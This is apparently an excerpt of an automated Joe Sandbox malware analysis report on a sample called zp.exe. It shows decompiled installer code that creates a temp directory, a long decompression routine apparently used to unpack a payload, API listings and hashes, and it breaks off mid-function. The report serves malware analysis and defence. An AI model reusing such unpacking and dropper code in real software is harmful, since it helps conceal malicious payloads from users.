                                                              • Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002519
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 1767494692-3916222277
                                                            • Opcode ID: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
                                                            • Instruction ID: 934e7617fa40043d42386ee9ca144464bf73cca2219d0ab945a4c64a7ea5d568
                                                            • Opcode Fuzzy Hash: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
                                                            • Instruction Fuzzy Hash: BA31AD758046059AFB41DF649CC6BDA37ECFF052D0F008425F90AAA19EDFB499458BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E004031E3(void* __eflags) {
                                                            				void* _t2;
                                                            				void* _t5;
                                                            				CHAR* _t6;
                                                            
                                                            				_t6 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                            				E00405F49(_t6);
                                                            				_t2 = E004057DB(_t6);
                                                            				if(_t2 != 0) {
                                                            					E0040576E(_t6);
                                                            					CreateDirectoryA(_t6, 0); // executed
                                                            					_t5 = E0040599E("1033", _t6); // executed
                                                            					return _t5;
                                                            				} else {
                                                            					return _t2;
                                                            				}
                                                            			}






                                                            0x004031e4
                                                            0x004031ea
                                                            0x004031f0
                                                            0x004031f7
                                                            0x004031fc
                                                            0x00403204
                                                            0x00403210
                                                            0x00403216
                                                            0x004031fa
                                                            0x004031fa
                                                            0x004031fa

                                                            APIs
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FA1
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FB3
                                                              • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FC3
                                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00403204
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 4115351271-2414109610
                                                            • Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                            • Instruction ID: 96047f1703e1a12197270cf5e797561ca5ab02306a5825906e00d3d3d2912a57
                                                            • Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                            • Instruction Fuzzy Hash: D8D0922160AD30A2D551372A3E0AFCF150C8F46769F118077F808760C24BAC5A8269FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 99%
                                                            			E004066ED() {
                                                            				signed int _t530;
                                                            				void _t537;
                                                            				signed int _t538;
                                                            				signed int _t539;
                                                            				unsigned short _t569;
                                                            				signed int _t579;
                                                            				signed int _t607;
                                                            				void* _t627;
                                                            				signed int _t628;
                                                            				signed int _t635;
                                                            				signed int* _t643;
                                                            				void* _t644;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					_t530 =  *(_t644 - 0x30);
                                                            					if(_t530 >= 4) {
                                                            					}
                                                            					 *(_t644 - 0x40) = 6;
                                                            					 *(_t644 - 0x7c) = 0x19;
                                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                            					while(1) {
                                                            						L145:
                                                            						 *(_t644 - 0x50) = 1;
                                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            						while(1) {
                                                            							L149:
                                                            							if( *(_t644 - 0x48) <= 0) {
                                                            								goto L155;
                                                            							}
                                                            							L150:
                                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                            							 *(_t644 - 0x54) = _t643;
                                                            							_t569 =  *_t643;
                                                            							_t635 = _t569 & 0x0000ffff;
                                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                            							if( *(_t644 - 0xc) >= _t607) {
                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                            								_t628 = _t627 + 1;
                                                            								 *_t643 = _t569 - (_t569 >> 5);
                                                            								 *(_t644 - 0x50) = _t628;
                                                            							} else {
                                                            								 *(_t644 - 0x10) = _t607;
                                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                            							}
                                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                                            								L148:
                                                            								_t487 = _t644 - 0x48;
                                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                                            								L149:
                                                            								if( *(_t644 - 0x48) <= 0) {
                                                            									goto L155;
                                                            								}
                                                            								goto L150;
                                                            							} else {
                                                            								L154:
                                                            								L146:
                                                            								if( *(_t644 - 0x6c) == 0) {
                                                            									L169:
                                                            									 *(_t644 - 0x88) = 0x18;
                                                            									L170:
                                                            									_t579 = 0x22;
                                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                            									_t539 = 0;
                                                            									L172:
                                                            									return _t539;
                                                            								}
                                                            								L147:
                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            								_t484 = _t644 - 0x70;
                                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            								goto L148;
                                                            							}
                                                            							L155:
                                                            							_t537 =  *(_t644 - 0x7c);
                                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                            							while(1) {
                                                            								L140:
                                                            								 *(_t644 - 0x88) = _t537;
                                                            								while(1) {
                                                            									L1:
                                                            									_t538 =  *(_t644 - 0x88);
                                                            									if(_t538 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									L2:
                                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00406B5B))) {
                                                            										case 0:
                                                            											L3:
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											L4:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											_t538 =  *( *(_t644 - 0x70));
                                                            											if(_t538 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											L5:
                                                            											_t542 = _t538 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t581);
                                                            											_push(9);
                                                            											_pop(_t582);
                                                            											_t638 = _t542 / _t581;
                                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                                            											 *(_t644 - 0x3c) = _t633;
                                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                            												L10:
                                                            												if(_t641 == 0) {
                                                            													L12:
                                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t641 = _t641 - 1;
                                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                            												} while (_t641 != 0);
                                                            												goto L12;
                                                            											}
                                                            											L6:
                                                            											if( *(_t644 - 4) != 0) {
                                                            												GlobalFree( *(_t644 - 4));
                                                            											}
                                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t644 - 4) = _t538;
                                                            											if(_t538 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t644 - 0x6c);
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L157:
                                                            												 *(_t644 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											L14:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											_t45 = _t644 - 0x48;
                                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t644 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											L16:
                                                            											_t550 =  *(_t644 - 0x40);
                                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                                            												L20:
                                                            												 *(_t644 - 0x48) = 5;
                                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											L17:
                                                            											 *(_t644 - 0x74) = _t550;
                                                            											if( *(_t644 - 8) != 0) {
                                                            												GlobalFree( *(_t644 - 8));
                                                            											}
                                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                            											 *(_t644 - 8) = _t538;
                                                            											if(_t538 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                            											 *(_t644 - 0x84) = 6;
                                                            											 *(_t644 - 0x4c) = _t557;
                                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                            											goto L132;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t644 - 0x6c);
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L158:
                                                            												 *(_t644 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											L22:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											_t67 = _t644 - 0x70;
                                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                            											if( *(_t644 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t559 =  *_t642;
                                                            											_t626 = _t559 & 0x0000ffff;
                                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                            											if( *(_t644 - 0xc) >= _t596) {
                                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                            												 *(_t644 - 0x40) = 1;
                                                            												_t560 = _t559 - (_t559 >> 5);
                                                            												__eflags = _t560;
                                                            												 *_t642 = _t560;
                                                            											} else {
                                                            												 *(_t644 - 0x10) = _t596;
                                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                            											}
                                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											} else {
                                                            												goto L137;
                                                            											}
                                                            										case 5:
                                                            											L137:
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L168:
                                                            												 *(_t644 - 0x88) = 5;
                                                            												goto L170;
                                                            											}
                                                            											L138:
                                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            											L139:
                                                            											_t537 =  *(_t644 - 0x84);
                                                            											L140:
                                                            											 *(_t644 - 0x88) = _t537;
                                                            											goto L1;
                                                            										case 6:
                                                            											L25:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L36:
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											L26:
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												L35:
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												L32:
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											L66:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												L68:
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											L67:
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											goto L132;
                                                            										case 8:
                                                            											L70:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xa;
                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x38);
                                                            												__ecx =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                            												 *(__ebp - 0x84) = 9;
                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            											}
                                                            											goto L132;
                                                            										case 9:
                                                            											L73:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L90;
                                                            											}
                                                            											L74:
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											L75:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t259;
                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            											goto L76;
                                                            										case 0xa:
                                                            											L82:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L84:
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											L83:
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L89;
                                                            										case 0xb:
                                                            											L85:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L89:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L90:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L99:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L164:
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											L100:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t334 = __ebp - 0x70;
                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t334;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L101;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L159:
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											L38:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											L40:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												L45:
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L160:
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											L47:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												L49:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
